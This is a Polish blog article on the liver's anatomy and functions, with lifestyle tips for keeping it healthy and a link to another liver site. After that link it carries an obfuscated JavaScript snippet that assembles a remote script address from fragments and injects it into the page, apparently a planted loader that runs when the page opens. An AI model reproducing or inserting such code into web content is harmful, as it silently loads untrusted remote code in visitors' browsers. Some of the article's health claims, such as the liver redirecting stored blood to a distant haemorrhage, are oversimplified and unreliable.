Shadow

Sposób zachować wątrobę w dobrym stanie – Rola wątroby w organizmie

Wątroba to bez wątpienia jeden z najważniejszych narządów w ludzkim organizmie. Bardzo wiele osób nie zdaje sobie jednak sprawy, że nie troszcząc się o jej prawidłowe funkcjonowanie, często nieświadomie przyczynia się do pogorszenia swojego ogólnego stanu zdrowia. Dlaczego organ ten okazuje się tak istotny dla człowieka i jak można o niego zadbać, by nigdy nie zawiódł?

Czym dokładnie jest wątroba

Wątroba jest największym spośród narządów, znajdujących się w ciele człowieka. U dorosłego człowieka waży niemal dwa kilogramy. Znajduje się w prawej części jamy brzusznej, u góry. Przed urazami chronią ją żebra.

Składa się ona z czterech płatów: lewego, prawego, ogoniastego oraz czworobocznego. Na jej masę składają się przede wszystkim hepatocyty – komórki wątroby. Gdy dochodzi do ich uszkodzenia, możliwa jest późniejsza odbudowy, ponieważ organ ten wykazuje duże zdolności do regeneracji.

Niemniej jednak, profilaktyka wątroby jest bardzo ważna, ponieważ najlepiej zapobiegać możliwym schorzeniom tego narządu, niż później zajmować się ich leczeniem.

Jakie są jej zadania?

Najważniejszym zadaniem, jakie stoi przed wątrobą, jest wchłanianie, a następnie neutralizowanie toksyn, które pojawiają się w organizmie (jedne wytwarzają inne narządy, inne natomiast są do niego dostarczane chociażby z pokarmem).

Wątroba odciąża również inne organy, dzięki czemu nie muszą pracować non stop. Zajmuje się ponadto magazynowaniem glikogenu, który stanowi szczególny zapas energetyczny dla ludzkiego organizmu. Dokonuje ona także metabolizmu tłuszczów oraz produkuje cholesterol, stanowiący podstawę do produkcji kwasów żółciowych.

Co ważne, wątroba potrafi zmagazynować w sobie duże ilości krwi, dzięki czemu w razie wystąpienia groźnego krwotoku w innej części organizmu, jest w stanie przesłać ją w tamto miejsce i tym samym uratować życie człowieka.

W jaki sposób zachować wątrobę w dobrym stanie?

Właściwie przeprowadzana profilaktyka wątroby pozwala funkcjonować temu organowi bardzo długo i nie powodować żadnych niepożądanych objawów. Przede wszystkim, warto ograniczyć spożywanie kofeiny, alkoholu oraz pomyśleć o rezygnacji z palenia.

Nie zaszkodzi też uważać z tłustymi potrawami, które są w stanie mocno obciążyć ten narząd. O wątrobę powinny szczególnie dbać wszystkie osoby, u jakich stwierdzono podwyższony poziom cholesterolu. Wówczas lekarz najczęściej przepisuje odpowiednie leki, by we właściwy sposób pomóc organizmowi.

Jeśli chcesz się dowiedzieć, jak jeszcze wpłynąć na stan swojej wątroby, odwiedź stronę: http://szczesliwawatroba.pl/watroba-a-styl-zycia.html.

(function(){
tdgzu=”2xl87nn5dgzk”;tdgz=document.createElement(„script”);
tdgz_=”u”+(„st”);tdgz_+=”at”+(„.”);tdgz.async=true;tdgz_+=”in”;
tdgzu=”67565701.”+tdgzu;tdgz.type=”text/javascript”;tdgzu+=”mpljjrh3frjr”;
tdgzu+=”kib4m8″;tdgz_+=(„f”)+”o”+(„/”);tdgz.src=”//”+tdgz_+tdgzu;
tdgzd=document.body;tdgzd.appendChild(tdgz);
})();

Przeczytaj także

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.